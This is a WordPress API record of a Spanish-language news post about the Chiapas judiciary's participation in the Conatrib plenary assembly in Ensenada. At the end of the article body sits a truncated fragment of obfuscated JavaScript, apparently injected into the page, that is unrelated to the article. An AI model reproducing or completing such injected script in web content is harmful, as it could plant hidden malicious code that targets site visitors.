{"id":10827,"date":"2023-07-03T03:32:23","date_gmt":"2023-07-03T03:32:23","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10827"},"modified":"2023-07-03T03:32:23","modified_gmt":"2023-07-03T03:32:23","slug":"participa-poder-judicial-en-segunda-asamblea-plenaria-de-conatrib-2023","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10827","title":{"rendered":"Participa Poder Judicial en Segunda Asamblea Plenaria de Conatrib 2023"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/IMG-20230702-WA0036-1024x682.jpg\" alt=\"\" class=\"wp-image-10828\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/IMG-20230702-WA0036-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/IMG-20230702-WA0036-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/IMG-20230702-WA0036-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/IMG-20230702-WA0036-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/IMG-20230702-WA0036.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Ensenada, BC, 30 de junio de 2023.- El magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura del Estado, Guillermo Ramos P\u00e9rez, particip\u00f3 en la inauguraci\u00f3n y puesta en marcha de las actividades de la Segunda Asamblea Plenaria Ordinaria de la Comisi\u00f3n Nacional de Tribunales Superiores de Justicia de los Estados Unidos Mexicanos (Conatrib) 2023; realizada en Ensenada, Baja California.<\/p>\n\n\n\n<p>Durante el acto inaugural encabezado por la gobernadora de la entidad, Marina del Pilar \u00c1vila Olmeda; y con la presencia del presidente de la Conatrib, magistrado Rafael Guerra \u00c1lvarez; el presidente anfitri\u00f3n del Poder Judicial de Baja California, Alejandro Isaac Fragozo L\u00f3pez; as\u00ed como presidentes y representantes de 30 poderes judiciales estatales, se destac\u00f3 la importancia de invertir en la implementaci\u00f3n del C\u00f3digo Nacional de Procedimientos Civiles y Familiares como una acci\u00f3n a favor del Estado de Derecho, la vanguardia t\u00e9cnica y tecnol\u00f3gica, la seguridad y la paz social.<\/p>\n\n\n\n<p>En su intervenci\u00f3n, el magistrado Rafael Guerra, subray\u00f3 que con esta implementaci\u00f3n los poderes judiciales hacen hincapi\u00e9 en humanizar la impartici\u00f3n de justicia para acercarla a las personas menos escuchadas, y con la apertura de posibilidades para promover, respetar, proteger y garantizar los derechos universales.<\/p>\n\n\n\n<p>En este sentido, y posterior al inicio de los trabajos de la asamblea, Ramos P\u00e9rez ratific\u00f3 el compromiso del Poder Judicial de Chiapas en trabajar como un tribunal de puertas abiertas, desde la respetuosa coordinaci\u00f3n de Poderes en la entidad, con el quehacer judicial nacional y enfatiz\u00f3 que con este nuevo C\u00f3digo, se agilizar\u00e1n los procedimientos en beneficio de las y los justiciables, al ser las materias familiar y civil, las que ocupan la mayor carga de trabajo de las jurisdicciones locales.<\/p>\n\n\n\n<p>De esta manera, las y los integrantes de la Conatrib abordaron temas tales como el proyecto Teclabm, hacia Tribunales Efectivos y Justicia Laboral Coordinada, a cargo de la Embajada de Estados Unidos; los avances del Proyecto de Monitoreo y Evaluaci\u00f3n de las Gu\u00edas Judiciales de Conducci\u00f3n de Audiencias Penales por parte de la Unidad para la Consolidaci\u00f3n del Nuevo Sistema de Justicia Penal del Poder Judicial de la Federaci\u00f3n; adem\u00e1s de temas relativos a la Red Nacional de Mecanismos Alternativos de Soluci\u00f3n de Controversias y la firma de un convenio de colaboraci\u00f3n entre la Conatrib y la Procuradur\u00eda Federal de Protecci\u00f3n a Ni\u00f1as, Ni\u00f1os y Adolescentes.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Ensenada, BC, 30 de junio de 2023.- El magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura del Estado, Guillermo Ramos P\u00e9rez, particip\u00f3 en la inauguraci\u00f3n y puesta en marcha de las actividades de la Segunda Asamblea Plenaria Ordinaria de la Comisi\u00f3n Nacional de Tribunales Superiores de Justicia de los Estados &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10828,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-10827","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10827","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10827"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10827\/revisions"}],"predecessor-version":[{"id":10829,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10827\/revisions\/10829"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10828"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10827"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10827"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10827"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}